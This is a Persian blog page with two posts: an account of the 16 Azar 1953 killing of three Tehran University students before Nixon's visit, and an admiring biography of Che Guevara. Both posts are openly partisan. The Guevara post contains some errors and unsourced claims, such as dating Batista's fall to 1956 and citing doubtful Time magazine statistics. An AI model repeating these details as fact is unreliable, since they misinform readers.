loading...
مقالات آموزشی کمیاب و دانلود رایگان نرم افزار های مفید
کیانوش انصاری بازدید : 134 دوشنبه 26 مهر 1389 نظرات (0)
16 آذر سال 32 بود؛ نه! دو ماه قبل از آن، تاریخ 16 مهر 32. 

بیشتر از 50 روز از كودتاى آمریكایى ارتشبد زاهدى نگذشته بود. مردم هنوز درك كودتا برایشان سنگین بود. اولین تظاهرات یك پارچه مردم علیه رژیم كودتا در همین روز اتفاق افتاد؛ دانشگاه و بازار به طرفدارى از تظاهركنندگان اعتصاب كردند. تظاهرات به قدرى سنگین بود كه كودتاچیان وارد معركه شدند و طاق بازار را بر سر بازاریان خراب كردند و دكان‏هاى آنان را به وسیله مزدوران خود غارت كردند. 

16 آبان سال 32 بود؛ كابینه زاهدى و دولت انگلستان براى تجدید روابط ایران و انگلستان كه در جریان ملى سازى نفت قطع شده بود، مخفیانه شروع به مذاكرات كردند. 

در تاریخ 24 آبان اعلام شد كه نیكسون معاون رئیس جمهور آمریكا از طرف آیزنهاور به ایران مى‏آید. نیكسون به ایران مى‏آمد تا نتایج «پیروزى سیاسى امیدبخشى را كه در ایران نصیب قواى طرفدار تثبیت اوضاع و قواى آزادى شده است» (نقل از نطق آیزنهاور در كنگره آمریكا بعد از كودتاى 28 مرداد) ببیند. دانشجویان مبارز دانشگاه نیز تصمیم گرفتند كه هنگام ورود نیكسون، نفرت و انزجار خود را به دستگاه كودتا نشان دهند. وقوع تظاهرات هنگام ورود نیكسون حتمى مى‏نمود. 

دو روز قبل از آن واقعه تلخ (14 آذر) زاهدى تجدید رابطه با انگلستان را رسما اعلام كرد و قرار شد كه «دنیس رایت» ، كاردار سفارت انگلستان، چند روز بعد به ایران بیاید. از همان روز 14 آذر تظاهراتى در گوشه و كنار به وقوع پیوست كه در نتیجه در بازار و دانشگاه عده‏اى دست گیر شدند. این وضع در روز 15 آذر هم ادامه داشت. 

رژیم شاه براى مسلط شدن بر اوضاع و حفظ سلامت (!) سفر نیكسون نیروهاى نظامى خود را در دانشگاه مستقر كرد؛ روز 15 آذر یكى از دربانان دانشگاه شنیده بود كه تلفنى به یكى از افسران گارد دانشگاه دستور مى‏رسد كه باید دانشجویى را شقه كرد و جلوى در بزرگ دانشگاه آویخت كه عبرت همه شود و هنگام ورود نیسكون صدها خفه گردد و جنبنده‏اى نجنبد... 

صبح شانزده آذر، هنگام ورود به دانشگاه، دانشجویان متوجه تجهیزات فوق العاده سربازان و اوضاع غیر عادى اطراف دانشگاه شده، وقوع حادثه‏اى را پیش بینى مى‏كردند. 

دانشجویان حتى الامكان سعى مى‏كردند كه به هیچ وجه بهانه‏اى به دست بهانه جویان ندهند. از این رو دانشجویان با كمال خون سردى و احتیاط به كلاس‌ها ‌رفتند و سربازان به راهنمایى عده‏اى كارآگاه به راه افتادند. ساعت اول بدون حادثه مهمى گذشت و چون بهانه‏اى به دست آنان نیامد به داخل دانشكده‏ها هجوم مى‏آوردند؛ از پزشكى، داروسازى، حقوق و علوم عده زیادى را دستگیر كردند. بین دست گیر شدندگان چند استاد نیز دیده مى‏شد كه به جاى دانشجو مورد حمله قرار گرفته و پس از مضروب شدن به داخل كامیون كشیده شدند؛ چون احتمال وقوع حوادث وخیم‏ترى مى‏رفت، لذا براى حفظ جان دانشجویان، دانشكده را تعطیل كردند و به آنها دستور دادند به خانه‏هاى خود بروند و تا اطلاع ثانوى در خانه بمانند. 

دانشجویان نیز به پیروى از تصمیم اولیاى دانشكده، محوطه دانشگاه را ترك مى‏كردند ولى هنوز نیمى از دانشجویان در حال خروج بودند كه ناگاه سربازان به دانشكده فنى حمله كردند. بهانه حمله آنان به دانشكده ظاهرا این بود كه در این گیر و دار دو دانشجوى رشته ساختمان به حضور نظامیان در دانشگاه اعتراض مى‏كنند. ارتشى‏ها براى دست‏گیرى آنان وارد دانشكده فنى وارد كلاس درس مهندس شمس مى‏شوند تا دانشجویان معترض را دست گیر كنند؛ وقتى مهندس شمس نسبت به حضور نظامیان در كلاس درس خود اعتراض مى‏كند او را با مسلسل به جاى خود مى‏نشانند و حتى یا شكنجه مستخدم دانشكده سعى مى‏كنند كه آن دو دانشجو را بیابند. 

رئیس وقت دانشگاه تهران براى اینكه جلوى ناآرامى‏ها را بگیرد، كل دانشگاه تهران را تعطیل كرد. حضور نظامیان در صحن دانشكده فنى باعث شد كه بین نظامیان و دانشجویان، زد و خورد شود. عده‏اى از سربازان، دانشكده فنى را به كافى محاصره كرده بودند تا كسى از میدان نگریزد. آنگاه دسته‏اى از سربازان با سر نیزه از در بزرگ دانشكده وارد شدند. 

اكثر دانشجویان به ناچار پا به فرار گذاردند تا از درهاى جنوبى و غربى دانشكده خارج شوند. در این میان بغض یكى از دانشجویان تركید و او كه مرگ را به چشم مى‏دید و خود را كشته مى‏دانست دگر نتوانست این همه فشار درونى را تحمل كند و آتش از سینه پرسوز و گدازش به شكل شعارى كوتاه بیرون ریخت: «دست نظامیان از دانشگاه كوتاه!» . هنوز صداى او خاموش نشده بود كه رگبار گلوله باریدن گرفت و چون دانشجویان فرصت فرار نداشتند به كلى غافل گیر شدند و در همان لحظه اول عده زیادى هدف گلوله قرار گرفتند. به خصوص كه بین محوطه مركزى دانشكده فنى و قسمت‏هاى جنوبى، سه پله وجود داشت و هنگام عقب نشینى عده زیادى از دانشجویان روى پله‏ها افتاده، نتوانستند خود را نجات دهند، مصطفى بزرگ نیا به ضرب سه گلوله از پا درآمد. مهندس شریعت رضوى كه ابتدا هدف قرار گرفته به سختى مجروح شده بود بر زمین مى‏خزید و ناله مى‏كرد، و دوباره هدف گلوله قرار گرفت. احمد قندچى حتى یك قدم هم به عقب برنداشته و در جاى اولیه خود ایستاده بود و از گلوله باران اول مصون مانده یكى از جانیان «دسته حاجیباز» با رگبار مسلسل سینه او را شكافت. 

بعد از پایان درگیرى‏ها احمد هنوز زنده بود؛ او را به یكى از بیمارستان‏هاى نظامى تهران منتقل كردند. در حالى كه در درگیرى‏ها لوله شوفاژ در مقابل احمد تركید بود و آب جوش تمام سر و صورت او را به شدت مجروح كرده بود با این حال مسئولان بیمارستان از مداوا و حتى تزریق خون به او ابا كردند و 24 ساعت بعد او مظلومانه شهید شد. 

مظلومیت قندچى به حدى بود كه حتى بعد از شهادت، به خانواده‏اش گفته بودند كه احمد را با دو شهید دیگر در امام زاده عبدالله دفن كرده‏اند. برادر شهید قندچى گفت: «بعد از این كه فهمیدیم احمد را در مسگر آباد دفن كرده‏اند با خانواده شریعت رضوى و بزرگ نیا به مسگر آباد رفتیم و قبر شهید را نبش كردیم و او را مخفیانه به امام زاده عبدالله بردیم و در آنجا در كنار دوستانش به خاك سپردیم.»  

در جریان درگیرى 16 آذر عده زیادى از دانشجویان كه تحت فشار و حمله قرار گرفته بودند به ناچار به آزمایشگاه پناه بردند. پس از ختم گلوله باران دقیقه‏اى سكوت، دانشكده را فرا گرفت. ناگهان میان سكوت ناله بلندى به گوش رسید كه مانند دشنه در قلب‏ها فرو رفت و از چشم بیش‏تر دانشجویان اشك جارى شد. ناله‏هاى بلند سوزناك مى‏فهماند كه عده‏اى مجروح شده‏اند و در همان جا افتاده‏اند. اولیاى دانشكده، مستخدمان و چند نفرى از دانشكده پزشكى مى‏خواستند مجروحان را به پزشكى برده معالجه كنند ولى سربازان با تهدید به مرگ مانع این كار شدند. بدن مجروحان در حدود دو ساعت در وسط دانشگاه افتاده بود و خون جارى بود تا بالاخره جان سپردند. بدین ترتیب سه نفر از دانشجویان (بزرگ نیا، قندچى و شریعت رضوى) شهید و بیست و هفت نفر دستگیر و عده زیادى مجروح شدند. 

خبر واقعه 16 آذر به سرعت در تمام تهران پخش شد. در روز 17 آذر تمام دانشگاه‏هاى تهران و اغلب شهرستان‏ها در اعتصاب كامل به سر بردند؛ حتى بسیارى از دبیرستان‏ها هم با تعطیل كردن مدرسه خود هم دوش دانشگاهیان در تظاهرات علیه فجایع 16 آذر و سفر نیكسون به تهران شركت كردند. 

براى كم رنگ كردن واقعه 16 آذر، جنایت كاران شروع به سفسطه كردند. در مقابل خبرنگاران گفتند كه: «دانشجویان براى گرفتن تفنگ سربازان حمله كردند و سربازان نیز اجبارا تیرهایى به هوا شلیك نمودند و تصادفا سه نفر كشته شد.» در همان روزها یكى از مطبوعات نوشت: «اگر تیرها هوایى شلیك شده، پس دانشجویان پر درآورده و خود را به گلوله زدند!»  

رژیم براى این كه واقعه 16 آذر زودتر از یادها برود از برپایى مراسم یادبود شهدا جلوگیرى كرد. 

برادر شهید شریعت رضوى مى‏گوید: «بعد از شهادت این سه تن به ما اجازه برگزار كردن شب سوم در خانه هایمان را هم ندادند؛ ولى در مراسم چهلم به خاطر پافشارى زیادى كه كردیم فقط 300 كارت كه مهر حكومت نظامى روى آن خورده بود به من دادند. هر كس مى‏خواست به طرف امام زاده عبدالله برود كارتش را كنترل مى‏كردند.»  

برادر شهید بزرگ نیا نیز مى‏گوید: «از طریق علم، شاه به پدرم تسلیت گفت و پیغام داد 200 هزار تومان خون بها بدهند كه جواب رد دادیم؛ بعد مى‏خواستیم مجلس ختم و شب هفت بگیریم، مخالفت كردند. تا این كه خودم پیش سرتیب بختیار فرماندار نظامى رفتم و متعهد شدم اگر اتفاقى افتاد خودم مسئول باشم.»  

درست روز بعد از واقعه 16 آذر، نیكسون به ایران آمد و در همان دانشگاه، در همان دانشگاهى كه هنوز به خون دانشجویان بى گناه رنگین بود دكتراى افتخارى حقوق دریافت كرد. صبح ورود نیكسون یكى از روزنامه‏ها در سر مقاله خود تحت عنوان «سه قطره خون» نامه سرگشاده‏اى به نیكسون نوشت. در این نامه سرگشاده ابتدا به سنت قدیم ما ایرانى‏ها اشاره شده بود كه «هرگاه دوستى از سفر مى‏آید یا كسى از زیارت بازمى گردد و یا شخصیتى بزرگ وارد مى‏شود ما ایرانیان به فراخور حال در قدم او گاوى و گوسفندى قربانى مى‏كنیم؛ آنگاه خطاب به نیكسون گفته شده بود كه «آقاى نیكسون! وجود شما آن قدر گرامى و عزیز بود كه در قدوم شما سه نفر از بهترین جوانان این كشور یعنى دانشجویان دانشگاه را قربانى كردند.»  

 

 

--------------------- 

منابع: 

1- خاطرات شهید چمران 

2- روزنامه كیهان آذر 58 

3- روزنامه اطلاعات آذر 58 

4- روزنامه جمهورى اسلامى آذر 58 

کیانوش انصاری بازدید : 179 دوشنبه 26 مهر 1389 نظرات (0)

تقریباً همه ما اسم ارنستو چگوارا ملقب به "چه" را شنیده ایم

اما محتمل است بسیاری از ما وی را کاملاً نشناسیم

اگر کمبود یا خطایی دیدید ممنون میشم ضمن تصحیح به من هم گوشزد کنید. 

 

 "ارنستو چگوارا دلاسرنا"نام كامل اوست و لقب «چه» را كوبایی‌ها به او داده‌اند، لقبی كه در این كشور برای خطاب قرار دادن كسی با احترام به كار برده می‌شود. «چه» مبارزی است كه آوازهء او تنها به آمریكای لاتین محدود نمی‌شود

 

 

 مجلهء تایم چه‌گوارا را جزو یكی از صد چهرهء تاثیر گذار در قرن بیستم انتخاب كرده است. در استكهلم بیش از سیصد عنوان كتاب دربارهء او منتشر شده است. كافه‌ای در مالزی وجود دارد كه روی تمام فنجان‌های قهوه‌اش عكس او چاپ شده است و پاتوق طرفداران «چه» است.تفریح جوانان میلانی، فروش تی‌شرت‌های «چه» كنار خیابان‌هاست. دولت برزیل نام چند سینمای این كشور را «ارنستو چه‌گوارا» گذاشته است. كلاه مدل «چه‌گوارا» پر فروش‌ترین نوع كلاه در تابستان‌های تركیه است. مارك «چه‌گوارا» معروف‌ترین مارك سیگار در سودان معرفی شده است و باز هم طبق آمار مجلهء تایم حدود 76 درصد جوانان دنیا «چه» را می‌شناسند و برای او احترام قائلند. مردم بولیوی به خود می‌بالند چون «چه» به خاطر آنان و در آنجا كشته شده است هرازگاهی دعوای میان ملت‌ها هم بالا می‌گیرد. ایرلندی‌ها معتقدند چون پدر «چه» اهل این كشور بوده پس «چه» به آن‌ها تعلق دارد. آرژانتینی‌ها می‌گویند كه چون او ملیت این كشور را داشته و در همان جا تحصیل كرده پس یك آرژانتینی‌است. كوبایی‌ها اعتقاد دارند كه چون «چه» در سرزمین آن‌ها و به‌خاطر آن‌ها جنگیده در یك سخنرانی گفته كه افتخار می‌كند كوبایی باشد، پس او اهل كوبا است. چه‌گوارا را نمی‌توان متعلق به یك كشور دانست،چه آنكه نام و عكس چه‌گوارا امروزه در تمامی كشورهای دنیا به نماد اعتراض درمقابل استبداد و سرمایه داری نوین بدل شده است.«چه» متعلق به تمامی آزادی‌خواهان ضد امپریالیسم جهانست. ارنستو چه‌گوارا یكی از خیل عظیم  اسطوره‌های تاریخ است. 

 

ارنستو چگوارا

 

 

 اندیشه و عشق او به انسان فراتر از مرزهای جغرافیایی و نژادی است.بارزترین ویژگی‌او را می‌توان روحیهء مبارزه جویی و آشتی ناپذیری با ظلم و استبداد در هر قیافه و شكل دانست.او نه مرد سیاست بود و نه حسابگر و از دغل‌ها و نیرنگ‌های آن بیزار.   

 

«ارنستو چه‌گوارا» در 14 ژوئن 1928 در «روزاریو» دومین شهر مهم و بزرگ آرژانتین به دنیا آمد. در خانواده‌ای ممتاز از تبار اسپانیایی و ایرلندی كه گرایش‌های سیاسی چپ داشتند، بزرگ شد.

خانه آنها در زمان خود به محل تجمع آزادی خواهان آمریکای لاتین تبدیل شده بود .«ارنستو» بزرگ‌ترین فرزند خانواده بود.و تحت تعالیم مادر خود روح بزرگواری را دریافت .

در خانواده ای با اصل و نسب و مرفه بزرگ شد اما با داشتن پدر و مادری آزادی خواه و بزرگ که هیچوقت روح بلند پرواز اورا تحت تعالیم کلیسایی از بین نبردند رشد کرد .در سال 1953 از دانشكدهء پزشكی فارغ التحصیل شد و سپس سفر به دیگر كشورهای آمریكایی را آغاز كرد، سفری كه نقطهء عطفی در زندگی او بود.

وی در این سفر گرسنگی کشید

جانش به خطر افتاد

با جزامی ها زندگی و کار کرد

و تمام محرومیت ها و ظلم هایی که بر خلق آمریکایی لاتین را روا میداشتند میدید

وی در شیلی پس از اینکه سایه سنگین آمریکا را بر منابع آن کشور دید به این نتیجه رسید عامل بدبختی این مردم استثمار امپریالیسم آمریکاست که این کشور هارا به یغما میبرد.

وی در این سفر با تمام سختی و مشکلات کنار آمد ولی زمانی که برگشت به یک نتیجه رسید

"باید خود را وقف مردم کنم"


در سال 1954 زمانی كه در «گواتمالا» بود با پشتیبانی از حكومت «جاكوب آربنز» كه منتخب مردم بود قدم به عرصهء مبارزات سیاسی گذاشت. آربنز در نتیجهء توطئه و در مداخلات تجاوز كارانهء سازمان سیا سرنگون شد و «چه» به مكزیك گریخت. اندكی بعد به فیدل كاسترو و دیگر انقلابیونی پیوست كه با جنبش 26 ژوییه در پی بر اندازی دیكتاتوری «فولژ نیسو باتیستا» در كوبا بودند.«گوارا» در دسامبر 1956 ازجمله مبارزانی بودكه به منظور آغاز مبارزه چریكی از عرشهء كشتی كوچك «گرانما» قدم به خاك كوبا گذاشتند. او كه در اصل پزشك گروه بود همچون یك فرماندهء ارتش شورشی ظاهر شد. درپی سقوط «باتیستا» در دسامبر 1956، چه‌گوارا یكی از رهبران حكومت تازهء كارگران و دهقانان شد و پست‌های دولتی متعددی چون ریاست بانك مركزی كوبا و وزارت صنایع به او واگذار شد. چه‌گوارا بارها به نمایندگی از كوبا درمجامع مختلف چون سازمان ملل متحد شركت كرد. او در مقام یكی از رهبران جنبش 26 ژوییه به برگزاری گردهمایی‌های گروه‌های سیاسی - كه سرانجام در 1965 به بنیان‌گذاری حزب كمونیست كوبا انجامید - یاری رساند.گوارا در اوایل 1965 از همهء مسوولیت‌ها و پست‌های دولتی كناره‌گیری كرد

زمانی که برنامه اقتصادی خود را ارائه کرد فهمید که او نمیتواند در این قسمت مفید باشد

معذرت خواهی کرد وکناره گیری کرد

وی یک شرط برای پیوستن به جنبش کوبا ارائه داده بود و این بود پس از پیروزی انقلاب او آزاد باشد که برود .

و به منظور كمك به پیشبرد مبارزه‌های ضدامپریالیستی و ضد سرمایه‌داری در دیگركشور‌ها، كوبا را ترك كرد وهمراه با داوطلبانی كه بعدها در «بولیوی» به او پیوستند، نخست به كنگو «زئیر» رفت و در جنبش ضد امپریالیستی آن كشور به رهبری  «پاتریس لومومبا» شركت جست.

در کنگو به این نتیجه رسید عامل فقر و عقب افتادگی و ظلم پذیری آنان چیزی نیست جز "فقر فکری"!!!توجه داشته باشید "چه"قبل از مبارزه در بولیوی در کنگو جنگیده بود.

پس از کشته شدن لومومبا از نوامبر 1966 تااكتبر 1967 جنبش چریكی بولیوی را بر ضد دیكتاتوری نظامی آن كشور رهبری كرد.

و این در اصل یک برنامه سیاسی برای حذف چه گوارا از کوبا بود!چه گوارا از مخالفان شوروی بود که آنان را "شکل دوم امپریالیسم"خواند که از کشورهای تحت الحمایت خود اخاذی میکند

به فیدل خرده گرفت که کوبا انقلابی نکرد بلکه شکل وابستگی اش عوض شده است!و برای همین اورا از سیاست کوبا کنار گذاشتند و وی طبق قرار خود برای کمک به آزادی خواهان از آنجا رفت.درهفتم اكتبر 1967 در عملیات رزمی ساختهء سازمان سیا به دست نظامیان بولیوی زخمی و دستگیر و روز بعد از آن تیرباران شد. زمانی که میخواستند اورا اعدام کنند فریاد زد:

ترسوها شلیک کنید شما دارید فقط یک چه گوارا را می کشید

 

امروزه پس از گذشت قریب پنجاه  سال ازمرگش هنوز هم او یكی از چهره‌های محبوب اسطورهای به خصوص درمیان جوانان است. اسطورهء عصیان كه نامش پرچم هر مبارزه‌ای است. شخصی كه تصویرش بر پیراهن‌های سرخی نقش بسته كه جوانان معترض بر تن می‌كنند بی آنكه از اندیشه‌های انقلابی او خبر داشته و یا حتی جهان بینی او را پذیرفته باشند.   

«چه» می‌توانست همچون بسیاری از فارغ التحصیلان رشتهء پزشكی در گوشه‌ای از دنیا برای خود مطبی دایركند،به زندگی بورژوایی خود بپردازد و همچون دیگران وقتی خبر کشته شدن کودکی را میشنید فقط لبخندی میزد و مانند فاشیستهایی که ما هروزه آنان را میبینیم میگفت :به من چه؟ حقش بود!!!


ارنستو چگوارا

اما روح عصیانگرش او را واداشت تا به یاری همنوعانش درمناطق استبداد زدهء آمریكای لاتین بشتابد. زمانی كه چه‌گوارای جوان و دوست همراهش «آلبرتو گرانادو» با موتورسیكلت از ردهء خارج توترون 500 مدل 1939، كه تنها به بهای چند پزوی ناچیز خریداری شده بود، قصد سفر به دور آمریكای لاتین را جهت درمان بیماران جزامی كرد آمریكای سرخ لاتین در زیر چكمه‌های سنگین امپریالیسم جان می‌داد، اما نه «چه» و نه «آلبرتو» هیچ كدام از این حقیقت تلخ آگاهی نداشتند.آن‌ها تنها می‌خواستند مناظر بكر قارهء پهناورشان را از نزدیك ببینند و به كمك بیماران جزامی بشتابند، سفری كه پایانش به گونه‌ای دیگر بود و باعث تولد انسان‌هایی شدكه اكنون نام آن‌ها را مترادف با انقلاب به كار می‌برند.   

" چه‌گوارا" مردی بود كه هرگز در بند مقام، رهبری و یا افتخارات نبود. او اعتقاد راسخ داشت كه مبارزهء چریكی انقلابی، شكل بنیادین اقدام برای كسب آزادی خلق‌های آمریكای لاتین است و این نتیجه‌گیری ناشی از اوضاع اقتصادی، سیاسی و اجتماعی تقریبائ تمام كشورهای آمریكای لاتین بود. «چه» عمیقائ بر این باور بود كه رهبری سیاسی و نظامی مبارزه چریكی باید یگانه باشد و این كه مبارزه تنها می‌تواند توسط خود واحد چریكی رهبری شود، نه از طریق دفاتر راحت بوروكرات ها در شهرها.   

چه‌گوارا به معنای واقعی كلمه یك چریك مبارز اینترناسیونالیست بود. او می‌گوید: « هر قطرهء خون ریخته شده در سرزمینی كه در زیر پرچمش زاده نشده باشی، تجربه‌ای است كه به زندهء ماندگان منتقل می‌شود تا بعدا آن را در مبارزه برای رهایی كشورشان به كار برند. همچنان‌كه كه خلقی خود را آزاد می‌سازد، ‌قدمی بر می‌‌دارد در پیكار برای رهایی مردم خود ما.»   

«چه» معتقد بود كه هر انسانی برای رهایی از ظلم و استبداد باید بهایی برای‌آزادی‌اش پرداخت كند، او می‌گوید: «اسكلت آزادی ما قبلا شكل گرفته است، هنوز گوشت و لباس به این اسكلت نیامده است، ما بهای آزادی خود و حفاظت از آن را با خون و ایثار پرداخت می‌كنیم. ایثار و فداكاری ما آگاهانه است، سیرآزادی طولانی و در بعضی قسمت‌ها  ناشناخته است.»

ارنستو چگوارا

 

 

هفتم اكتبر 1967 «چه» آخرین سطرهای وقایع روزانهء خود و گروه چریكی‌اش را نوشت. روز بعد در ساعت یك بعدازظهر در یك درهء كم عرض و تنگ، جایی كه برای درهم شكستن محاصره به انتظارشب نشسته بودند، نیروی عظیمی از دشمن برآن‌ها تاخت. گروه كوچك مردانی كه واحد چریكی را تشكیل می‌دادند تا گرگ و میش بامداد قهرمانانه جنگیدند.ازكسانی كه در نزدیك‌ترین مواضع به «چه» می‌جنگیدند كسی زنده نماند جزو دو نفر كه به همراه «چه» مجروح و دستگیر شدند.   

روز بعد از دستگیری «چه» با شنیدن صدای شلیك فهمید كه دو همرزم «پرویی» و «بولیوی‌اش» اعدام شده‌اند. نوبت به «چه» رسیده بود، مجری اعدامش دستخوش تردید شده بود.

 »چه» با استواری فریاد زد «شلیك كن نترس !» آنگاه با شلیك یك رگبار مسلسل از كمر به پایین حكم اجرا شد. جلادان دستور داشتند او را از سر و سینه هدف قرار ندهند تا مرگش به تعویق بیفتد. این تصمیم ظالمانه عذاب «چه» را طولانی می‌كند تا این‌كه گروهبانی كه او نیز مست بوده است گلوله‌ای به پهلوی او شلیك می‌كند و به زندگیش پایان می‌دهد. این شیوهء رفتار، درست نقطهء مقابل احترامی بود كه «چه» بدون استثنا نسبت به افسران و سربازان بسیاری نشان می‌دادكه به اسارت او درآمده بودند.   

برای «چه» ساعت‌های پایانی زندگی‌اش در چنگ دشمن فرومایه قطعا بسیار تلخ بوده است; اما هیچ كس بهتر از او آمادگی گذراندن چنان آزمونی را نداشت.   

هشتم اكتبر چه‌گوارا تیر باران شد.جسدش را به هلی‌كوپتر بستند تا به همه اعلام كنند كه چریك مبارز را دستگیر كرده‌اند پس از انتقال جسد «چه» به «هیگوئرا» روستایی درشمال بولیوی، تازه همه فهمیدند چه كسی كشته شده است. حكومت وقت از ترس، جسد «چه» را سوزاند و بقایای استخوانش را در مكان نامعلومی خاك كرد. سال‌ها بعد در پی فشار دولت كوبا و شخص فیدل كاسترو، دولت بولیوی استخوان‌ها را در تابوت گذاشت و به كوبا فرستاد تا «چه‌گوارا» در میان اشك و احترام دفن شود.

جنبش‏های اعتراضی کارگران و زحمت‏کشان در کوران مبارزاتی خویش علیه‏ی‏ سرمایه در اقصا نقاط دنیا، علی‏رغم بر جای‏گذاری خسران‏های جانی و مالی، از دستآوردهای بسیار ارزنده‏ای برخوردار می‏باشد که بی تردید نگاهِ دقیق به‏هر یک از این دوره‏ها می‏تواند بر رادیکالیزم مبارزاتی توده‏ها بی‏افزاید. به‏عبارتی دیگر، تاریخ مبارزاتی توده‏های ستم‏دیده‏ مملو از تحولات دگرگونه‏ساز و نقش‏آفرینی‏های بی‏دریغِ عناصر کمونیست و رزمنده، علیه‏ی نظام‏های ظالمانانه و سرکوب‏گر می‏باشد؛ عناصرئی که به امیال و منفعت فردی خود پشت پا زدند و به دنیایی اندیشیدند که مبلغ و مدافع‏ی سعادت و خوش‏بدبختی انسان‏های محروم بود. بی اغراق می‏توان گفت که یکی از آن اسطوره‏ها و کمونیستِ عاشقِ منافع‏ کارگران و زحمت‏کشان، «ارنستو چه گوارا» بود.

«چه گوارا"ئی که جنبش کمونیستی دنیا بدان مفتخر می‏باشد و نام و اعمال او را در تاریخ‏چه مبارزاتی خود به ثبت رسانده است. به‏راستی مگر می‏توان نام و نقش کمونیست‏هایی هم‏چون «چه» را در انقلابات رهائی‏بخش نادیده گرفت و بر جایگاه واقعی وی واقف نه‏گردید؟ دنیای مخالف سرمایه و دنیای مدافع‏ رهائی و آزادی همواره بر راه و مقّام کمونیست‏هایی هم‏چون «چه» واقف است و هرگز نام این رهروان انقلابات کارگری و مدافعین بی چون و چرای توده‏های ستم‏دیده را فراموش نه‏خواهد کرد؛ از یاد نه‏خواهد بُرد که چگونه فرزندان کارگران و زحمت‏کشان علی‏رغم هزاران مشکلات و معضلات رو در رو، پای پیش گذاشتند تا خلق‏شانرا آزاد سازنند.

 بر خلاف بسیاری از هم سن و سال‏های‏اش قدم در راهی گذاشت که چیزی جز به‏رسمیت شناختن حقوق میلیون‏ها انسان محروم نبود. به‏همین دلیل مارکسیسم – لنینیسم را سر منشاء کاری خود قرار داد و علی‏رغم کمی سن به ریشه‏ اصلی مصائب و دشواری‏های رو در روی زحمت‏کشان پی بُرد و با تمام وجود به‏مبارزه با آنان برخاست. تماس با انقلابیون کوبا و شرکت عملی در مبارزات‏شان علیه‏ حکومت سرکوب‏گر باتیستا و به تبع از آن پیروزی انقلاب از زمره فعالیت‏های سیاسی - عملی بی وقفه‏ «چه گوارا» را تشکیل می‏داد.

«چه گوارا» بعد از به اهتزاز در آوردن پرچم کارگران و زحمت‏کشان به‏همراه فیدل کاسترو و دیگر کمونیست‏های راستین در سرتاسر کوبا، قصد انقلابی دیگر، در نقطه‏ای دیگر از جامعه‏ی نظام‏های وابسته به امپریالیسم را در سر داشت و بر همین اساس، بدون کم‏ترین چشم‏داشتی، با همه و با مقّام و منصب خویش در کوبا وداع گفت و با باوری عمیق به وظایفِ انترناسیولیستی‏اش، به‏کمکِ دیگر انقلابیون شتافت.

«چه» علی‏رغم تعلق و وابستگی شدید به کوبا، قدم در راهی گذاشت که به‏جرأت می‏توان گفت جنبش کمونیستی جهان کم‏تر با چنین انسان‏هایی روبرو گردیده است؛ چرا که عمیقاً و عملاً بر این باور بود که: "هر کجا امپریالیسم چهره خود را نشان می‏دهد با او جنگ کن".  به‏راستی که بر اعتقادش پای فشرد و به‏جنگ با آنان برخاست.

بی‏گمان و در چارچوبه‏ی چنین واقعیاتی سرمایه‏داران و دشمنان طبقاتی توده‏های ستم‏دیده بی‏کار نه‏نشسته و در تلاش بودند تا مانع‏ی اوج‏گیری انقلاب و جنگی دیگر توسط فرزندان دلیر محرومان گردند. جنگی که «چه گوارا» به‏همراه چند تن دیگر از رزمندگان بولیوی، علیه‏ی دولت حاکم بر این کشور به‏راه انداختند.

اگر چه مزدوران و سرکوب‏گرانِ سرمایه قادر گردیدند بر جسم «چه گوارا» غلبه نمایند؛ امّا هرگز نه‏توانستند حقانیت و آرمان‏های والای وی را تا ابد دفن نمایند. بی دلیل نیست که «چه» به تاریخ پیوست و دنیای انسانیت و آزادی، مرگ «چه گوارا" را به تولدی دیگر تبدیل نمود؛ تولدی که میلیون‏ها انسان حقیقت‏جو، پرچم و تصویر او را در دست گرفته و همواره یاد او را گرامی می‏دارند و بر افکار و اعمال کمونیستی این انسان تحول‏گرا پای می‏فشارند.

در هشتادمین سال‏روز تولد «چه گوارا» جای دارد تا بار دیگر یاد این عنصر وفادار به آرمان‏های والای کارگران و زحمت‏کشان را گرامی داریم و بر این امر خطیر تاکید گردد که در دنیای سراسر ظلم و نکبت‏بار، تنها ایده‏هایی می‏توانند جامعه‏ی سراسر اجحاف و نابرابر را در هم ریزند که منفعت و خواسته‏های کارگران و زحمت‏کشان را بر منافع‏ی حقیر خویش تقدم شمارند. راه و آرمانی که «چه گوارا»ی کمونیست، مبلغ آن بود و تا آخرین لحظه از حیات خویش بدان وفادار ماند. بی دلیل نیست که «چه گوارا» در یادها باقی مانده است و همواره توده‏های ستم‏دیده‏ی سرتاسر جهان از وی به نیکی یاد می‏کنند.

 

ارنستو چگوارا che

 

 


«چه» مخالف شدید ورود یك انقلابی به كارهای اداری بود و بر این عقیده خود اصرار داشت كه كار اداری و پشت میز نشین شدن یك انقلابی او را فاسد ، تن پرور و بی خیال می كند و باعث تضعیف انقلاب می شود كه پس از یك نسل به فراموشی سپرده خواهد شد و وضعیت سابق به شكلی و ظاهری دیگر بازگشت می كند.
     او عقیده داشت كه یك انقلابی پس از پیروزی مقدماتی انقلاب و انهدام نظام سابق باید پاسدار نتایج آن شود و با جامعه در تماس تنگاتنگ باشد تا از ضعف ها و نارسایی ها آگاه شود و با رفع آنها از شكست انقلاب و تغییر ماهیت آن جلوگیری كند و در ساعات فراغت داوطلبانه به كمك كشاورزان، بیماران و صنعتگران و ... بشتابد تا این كه آرزوی داشتن مقام اداری اورا وسوسه نكند . "چه" خودش این كار را می كرد و در ساعات فراغت به كشاورزان نیشكر كمك می كرد. از اندرزهای دیگر او این بوده است كه یك انقلابی پس از پیروزی انقلاب باید مراقبت كند كه كسی یا كسانی از انقلاب سوء استفاده نكنند و فرصت طلبان را شناسایی و افشاء سازد تا جامعه، خود مراقب آنان باشد.
     «چه» به اهمیت زیربنایی رسانه ها اعتقاد داشت و به همین دلیل خبرگزاری "پرنسالاتینا " را برای كوبا تاسیس كرد كه هنوز به فعالیت خود ادامه می دهد.
     «چه» پس از پذیرفتن سمت وزیر صنایع كوبا و ملی كردن كارخانه های متعلق به اتباع آمریكا در آن كشور، متوجه شد كه انقلابی بودن یك كوشش تمام وقت است و نباید نیروی خود را صرف كارهای اداری كند و ماشین امضاء شود و كناره گیری كرد.
    قتل باتریس لومومبا و به شكست كشانیدن انقلاب كنگو كه اقدامی مشابه براندازی های ایران و گواتمالا بود "چه" را سخت خشمناك كرد و در سال 1964 به آفریقا رفت و در آنجا به آموزش انقلابیون آن قاره پرداخت و «كابیلا» یكی از دست پروردگان او بود كه اواخر دهه 1990 رئیس جمهوری كنگو شد.
    جوانان دهه 1960 "چه" را شایان تقلید و مرشد خود می پنداشتند و او را "ال چه El Che" خطاب می كردند.
